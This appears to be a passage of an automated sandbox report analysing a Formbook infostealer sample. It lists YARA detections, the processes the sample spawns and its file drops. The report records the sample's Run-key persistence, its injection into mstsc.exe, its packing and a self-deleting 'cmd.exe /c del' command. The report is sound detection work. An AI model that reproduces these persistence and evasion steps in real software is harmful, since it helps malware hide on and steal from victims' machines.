          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C426B1
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C42987
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00401030
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041B091
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00408A30
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00402D87
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00402D90
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041BE80
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041BE8A
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041C6AB
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041C7F2
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00402FB0
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED28EC
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E320A0
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED20A8
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1B090
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EDE824
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2A830
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC1002
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E24120
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E0F900
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED22AE
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EBFA2B
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EC03DA
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECDBD2
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E3EBB0
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E2AB40
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED2B28
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECD466
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1841F
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E1D5E0
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED25DD
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E32581
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED1D55
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E00D20
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED2D07
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED2EF7
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E26E30
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ECD616
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00ED1FF1
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00EDDFCE
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00401030
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041B091
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00408A30
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00402D87
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00402D90
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041BE80
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041BE8A
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041C6AB
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041C7F2
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00402FB0
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeCode function: 19_2_01060C1C
          Source: C:\Users\user\Desktop\kayx.exeCode function: String function: 00419A40 appears 38 times
          Source: C:\Users\user\Desktop\kayx.exeCode function: String function: 00E0B150 appears 54 times
          Source: kayx.exe, 00000001.00000002.355661594.00000000059B0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs kayx.exe
          Source: kayx.exe, 00000001.00000002.351671330.0000000000F28000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
          Source: kayx.exe, 00000001.00000002.352304174.000000000333A000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameClassLibrary3.dll< vs kayx.exe
          Source: kayx.exe, 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameKlghppetippu.dll4 vs kayx.exe
          Source: kayx.exe, 0000000F.00000002.349503948.0000000000268000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
          Source: kayx.exe, 00000010.00000002.350319835.0000000000328000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
          Source: kayx.exe, 00000011.00000002.397054523.000000000108F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs kayx.exe
          Source: kayx.exe, 00000011.00000000.350990783.0000000000468000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
          Source: kayx.exe, 00000011.00000002.397835707.0000000002C23000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamemstsc.exej% vs kayx.exe
          Source: kayx.exeBinary or memory string: OriginalFilenameVdltohs3.exel% vs kayx.exe
          Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.485444810.0000000002F00000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.396099862.0000000000830000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.396027525.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000015.00000002.484279657.0000000000A00000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000002.396259639.0000000000980000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000011.00000001.351516494.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.352630853.00000000041E1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.kayx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.1.kayx.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.1.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 17.2.kayx.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: kayx.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: firefoxe.exe.1.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: kayx.exe, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: firefoxe.exe.1.dr, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 1.0.kayx.exe.ec0000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 1.2.kayx.exe.ec0000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 15.2.kayx.exe.200000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 15.0.kayx.exe.200000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 16.0.kayx.exe.2c0000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 16.2.kayx.exe.2c0000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 17.0.kayx.exe.400000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 19.0.firefoxe.exe.9a0000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: 19.2.firefoxe.exe.9a0000.0.unpack, u0006/u0005.csCryptographic APIs: 'TransformFinalBlock'
          Source: classification engineClassification label: mal100.troj.evad.winEXE@14/3@4/2
          Source: C:\Users\user\Desktop\kayx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notepedJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1632:120:WilError_01
          Source: kayx.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\kayx.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Windows\explorer.exeFile read: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\kayx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: kayx.exeVirustotal: Detection: 34%
          Source: kayx.exeReversingLabs: Detection: 45%
          Source: C:\Users\user\Desktop\kayx.exeFile read: C:\Users\user\Desktop\kayx.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\kayx.exe 'C:\Users\user\Desktop\kayx.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
          Source: unknownProcess created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
          Source: unknownProcess created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
          Source: unknownProcess created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\kayx.exeProcess created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
          Source: C:\Users\user\Desktop\kayx.exeProcess created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
          Source: C:\Users\user\Desktop\kayx.exeProcess created: C:\Users\user\Desktop\kayx.exe C:\Users\user\Desktop\kayx.exe
          Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe'
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\kayx.exe'
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{03C036F1-A186-11D0-824A-00AA005B4383}\InProcServer32
          Source: C:\Users\user\Desktop\kayx.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: kayx.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: kayx.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000012.00000000.376957565.000000000E1C0000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: kayx.exe, 00000011.00000003.351692207.0000000000AB0000.00000004.00000001.sdmp, mstsc.exe, 00000015.00000002.486610265.0000000004CAF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: kayx.exe, mstsc.exe, 00000015.00000002.486610265.0000000004CAF000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdbGCTL source: kayx.exe, 00000011.00000002.397529833.0000000002B00000.00000040.00000001.sdmp
          Source: Binary string: mstsc.pdb source: kayx.exe, 00000011.00000002.397529833.0000000002B00000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000012.00000000.376957565.000000000E1C0000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\kayx.exeUnpacked PE file: 17.2.kayx.exe.400000.0.unpack .text:ER;.rsrc:R;.reloc:R; vs .text:ER;
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_0185A9A1 push edx; iretd
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C48CE3 push E808AB5Eh; retf
          Source: C:\Users\user\Desktop\kayx.exeCode function: 1_2_05C48C8D push E808AB5Eh; retf
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041AD55 push eax; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041ADA2 push eax; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041ADAB push eax; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041AE0C push eax; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00414EC5 push CFF27278h; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00414E85 push CFF27278h; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00414740 push cs; iretd
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_0041478D push cs; iretd
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_2_00E5D0D1 push ecx; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041AD55 push eax; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041ADA2 push eax; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041ADAB push eax; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041AE0C push eax; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00414EC5 push CFF27278h; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00414E85 push CFF27278h; ret
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_00414740 push cs; iretd
          Source: C:\Users\user\Desktop\kayx.exeCode function: 17_1_0041478D push cs; iretd
          Source: initial sampleStatic PE information: section name: .text entropy: 7.94131868162
          Source: initial sampleStatic PE information: section name: .text entropy: 7.94131868162
          Source: C:\Users\user\Desktop\kayx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeJump to dropped file
          Source: C:\Users\user\Desktop\kayx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\notepedJump to behavior
          Source: C:\Users\user\Desktop\kayx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeJump to behavior
          Source: C:\Users\user\Desktop\kayx.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exe\:Zone.Identifier:$DATAJump to behavior
          Source: C:\Users\user\Desktop\kayx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefoxeJump to behavior
          Source: C:\Users\user\Desktop\kayx.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run firefoxeJump to behavior
          Source: C:\Windows\explorer.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\kayx.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\noteped\firefoxe.exeProcess information set: NOOPENFILEERRORBOX
